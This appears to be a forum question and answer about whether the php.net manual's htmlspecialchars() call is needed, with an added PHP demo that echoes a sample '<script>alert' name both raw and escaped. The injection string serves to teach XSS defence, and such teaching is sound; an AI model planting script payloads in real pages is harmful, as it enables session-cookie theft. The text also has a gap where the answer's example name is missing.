I was looking at the php.net manual and it had this line of code:
Hi <?php echo htmlspecialchars($_POST['name']); ?>.
You are <?php echo (int)$_POST['age']; ?> years old.
It says underneath:
htmlspecialchars() makes sure any characters that are special in html are properly encoded so people can’t inject HTML tags or Javascript into your page.
Is this really necessary?
Can someone actually put malicious code into that one line? What is there to worry about? Can something be injected into that line to run some PHP code? Are they just getting people accustomed to watching for this even though there is no threat in this case?
If someone’s name happened to be:
Then a worm could be unleashed on your site. In essence, the worm is just a script that takes the user's session cookie, logs in, and then does malicious stuff, replicating itself as more people view it.
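To see concretely what the manual's advice buys you, here is an added example (not code from the original post or from php.net) that feeds a constructed hostile "name" through the same two lines, once raw and once through htmlspecialchars(), and shows that the (int) cast on age leaves nothing but digits. The $post array stands in for $_POST.

```php
<?php
// Added example, not from the original post. Demonstrates what
// htmlspecialchars() changes in the manual's snippet and why the
// (int) cast is enough for the age field.

// Constructed sample input, standing in for $_POST['name'] / $_POST['age'].
$post = [
    'name' => "Bob <script>alert('xss')</script> O'Neil",
    'age'  => '42abc',
];

// Unsafe: the raw value is echoed straight into the page, so the browser
// parses the <script> tag as markup and runs it for every viewer.
function renderUnsafe(array $post): string
{
    return "Hi " . $post['name'] . ".";
}

// Safe: every HTML-special character (< > & " ') becomes an entity, so the
// browser shows the name as literal text instead of interpreting it.
// ENT_QUOTES also encodes single quotes, which matters if the value is ever
// placed inside a single-quoted attribute; 'UTF-8' pins the charset so the
// escaping cannot be confused by a mismatched encoding.
function renderSafe(array $post): string
{
    return "Hi " . htmlspecialchars($post['name'], ENT_QUOTES, 'UTF-8') . ".";
}

// The (int) cast keeps only the leading integer of the string, so the
// output is a plain number and no markup can survive it.
function renderAge(array $post): string
{
    return "You are " . (int) $post['age'] . " years old.";
}

echo renderUnsafe($post), PHP_EOL;
echo renderSafe($post), PHP_EOL;
echo renderAge($post), PHP_EOL;
```

Open the unsafe output in a browser and the alert fires; the safe output shows the script tag as visible text, which is exactly the difference the manual is pointing at.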